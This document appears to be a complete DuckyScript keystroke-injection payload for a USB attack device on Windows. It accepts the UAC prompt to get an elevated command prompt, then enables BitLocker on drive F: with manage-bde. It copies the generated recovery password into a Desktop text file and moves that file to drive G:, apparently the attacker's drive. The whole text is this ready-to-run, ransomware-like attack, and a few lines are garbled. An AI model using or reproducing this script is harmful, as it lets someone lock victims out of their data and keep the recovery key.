DELAY 500
Help
SUI R DELAY 500
STRING CMD
DELAY 500
CONTROL SHIFT ENTER
DELAY 1000
LEFT
DELAY 500
ENTER
DELAY 1000
STRING manage-bde on F: recoverykey C: -recoverypassword
DELAY 15000
ENTER
DELAY 20000
CONTROL A
DELAY 500
CONTROL C
DELAY 5000
STRING exit
DELAY 5000
ENTER
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 500
ESCAPE
DELAY 5000
STRING cd Desktop
DELAY 500
ENTER
DELAY 1000
STRING type nul>tupurt.txt
DELAY 500
ENTER
DELAY 600
STRING EXIT
DELAY 5000
ENTER
DELAY 5000
CONTROL ESCAPE
DELAY 5000
STRING tupurt.txt
DELAY 5000
ENTER
DELAY 5000
CONTROL V
DELAY 5000
CONTROL W
DELAY 5000
ENTER
CONTROL ESCAPE
DELAY 5000
STRING cmd
DELAY 5000
ENTER
DELAY 5000
STRING cd Desktop
DELAY 5000
ENTER
DELAY 5000
STRING move "tupurt.txt" "G:\"
DELAY 5000
ENTER
DELAY 5000
STRING exit
DELAY 5000
ENTER